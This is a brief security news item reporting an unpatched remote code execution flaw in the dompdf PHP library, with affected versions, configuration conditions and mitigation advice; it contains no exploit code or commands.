Unpatched RCE Bug in dompdf Project Affects HTML to PDF Converters

2022-03-16 06:14

Researchers have disclosed an unpatched security vulnerability in "Dompdf," a PHP-based HTML to PDF converter, that, if successfully exploited, could lead to remote code execution in certain configurations.

In other words, the flaw allows a malicious party to upload font files with a.php extension to the web server, which can then be activated by using an XSS vulnerability to inject HTML into a web page before it's rendered as a PDF. This meant that the attacker could potentially navigate to the uploaded.

According to statistics on GitHub, dompdf is used in nearly 59,250 repositories, making it a popular library for generating PDFs in the PHP programming language.

Dompdf versions 1.2.0 and prior that are located in a web-accessible directory and have the setting "$isRemoteEnabled" toggled on should be considered vulnerable.

"Security vulnerabilities often occur due to decisions made based on incorrect assumptions about underlying or interconnected components," the researchers said.

"Update dompdf to a recent version and turn off $isRemoteEnabled, if possible for your use case."

News URL

https://thehackernews.com/2022/03/unpatched-rce-bug-in-dompdf-project.html

#html #PDF #RCE